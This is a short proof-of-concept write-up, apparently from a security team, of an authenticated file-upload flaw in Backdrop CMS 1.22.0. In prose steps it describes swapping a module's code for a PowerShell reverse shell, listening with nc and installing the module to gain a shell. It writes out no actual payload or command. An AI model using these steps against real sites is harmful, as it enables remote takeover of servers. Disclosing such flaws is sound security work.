Backdrop CMS 1.22.0 — Unrestricted File Upload (Modules)

3 min readSep 28, 2022



# An Issue is discovered in Backdrop CMS 1.22.0

#We found a vulnerability file upload when we upload the malicious file as a module on the Install New Modules page.

Proof of Concept

First, we log in to the target application with admin privileges.

Then select Functionality and select Install new modules.

And then, we click Manual Installation.

We can upload with zip files.

We can find module files at the link following.

We download Twitter Filters Modules.

Next, We unzip

We proceed to the twitter_filters directory we unzip.

We generate PowerShell reverse shell payload from

We replace the content of twitter_filters.module with a reverse shell payload.

After that, we zip twitter_filters directory.

We using nc to listen on port 443

back to the Manual installation popup and upload

Next, we click the INSTALL button.

After the installation was completed successfully, we click on Enable newly added modules.

Finally, we get a shell connection.


Grim The Ripper Team by SOSECURE Thailand




You get the best out of others when you give the best of yourself